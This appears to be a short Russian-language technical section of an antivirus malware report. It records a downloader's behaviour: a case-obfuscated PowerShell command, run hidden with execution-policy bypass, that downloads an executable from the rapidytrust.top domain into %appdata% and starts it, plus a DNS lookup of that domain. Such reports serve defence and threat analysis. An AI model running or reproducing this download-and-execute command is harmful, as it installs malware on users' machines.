Техническая информация
- http://rapidytrust.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWErsHeLl.eXE -exECUTIOnpOLICY bYPAss -NOPROfilE -WindOWstYlE hiDdeN (NEW-ObJECt sYstEm.NeT.wEBcLient).dowNloADFiLE('http://rapidytrust.top/search.php','%appDatA%.EXE');sTArT...
- DNS ASK ra###ytrust.top
- '<SYSTEM32>\cmd.exe' /C "POWErsHeLl.eXE -exECUTIOnpOLICY bYPAss -NOPROfilE -WindOWstYlE hiDdeN (NEW-ObJECt sYstEm.NeT.wEBcLient).dowNloADFiLE('http://rapidytrust.top/search.php','%appDatA%.EXE');sTArT...' (со скрытым окном)